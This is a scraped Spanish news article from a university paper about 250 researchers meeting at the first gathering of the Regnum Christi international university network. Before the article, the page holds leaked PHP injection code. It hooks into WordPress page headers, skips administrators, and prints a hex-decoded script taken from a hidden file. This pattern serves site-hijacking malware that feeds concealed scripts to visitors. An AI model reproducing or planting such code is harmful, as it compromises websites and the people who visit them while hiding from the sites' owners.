if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } 250 investigadores celebran 1er Encuentro de Investigadores de la Red Internacional de Universidades del Regnum Christi  – La Opinión Universitaria La Opinión Universitaria
Menu

250 investigadores celebran 1er Encuentro de Investigadores de la Red Internacional de Universidades del Regnum Christi 

250 investigadores celebran 1er Encuentro de Investigadores de la Red Internacional de Universidades del Regnum Christi 

Con el objetivo de crear vinculación entre investigadores y establecer proyectos conjunto, se celebraró el 1er Encuentro de Investigadores de la Red Internacional de Universidades del Regnum Christi (RIU), teniendo como sede la Universidad Anáhuac México Sur, donde se contó con la participación de cerca de 250 investigadores y líderes educativos de las 14 instituciones que conforman la red en 5 países.

Durante el encuentro, se compartieron proyectos concretos y experiencias basados en cinco ámbitos temáticos: Salud Integral y Bienestar, Persona y Sociedad, Humanidades y Artes, Economía, Negocios y Desarrollo, y finalmente Ciencias Exactas y Tecnología.

El presidente de la RIU y rector de la Universidad Anáhuac Puebla, José Mata Temoltzin, compartió un mensaje a los investigadores resaltando que además de trabajar y compartir buenas prácticas, “Es importante dimensionar el gran potencial que tenemos como instituciones conjuntas, para proyectar lo que hacemos por medio de la investigación”. “Estoy convencido que desde nuestra red, debemos de impulsar la investigación en todo momento, tenemos la enorme responsabilidad de abonar un pensamiento mucho más humanista, mucho más crítico sobre las realidades que nos rodean”.

En este encuentro, participaron 14 investigadores de la Anáhuac Puebla quienes desde su especialidad, y en conjunto con los demás representantes, fortalecerán las diferentes líneas de investigación, abonando con ello al desarrollo educativo y brindando herramientas para la solución a las diferentes problemáticas que vive actualmente la sociedad.

Tweets recientes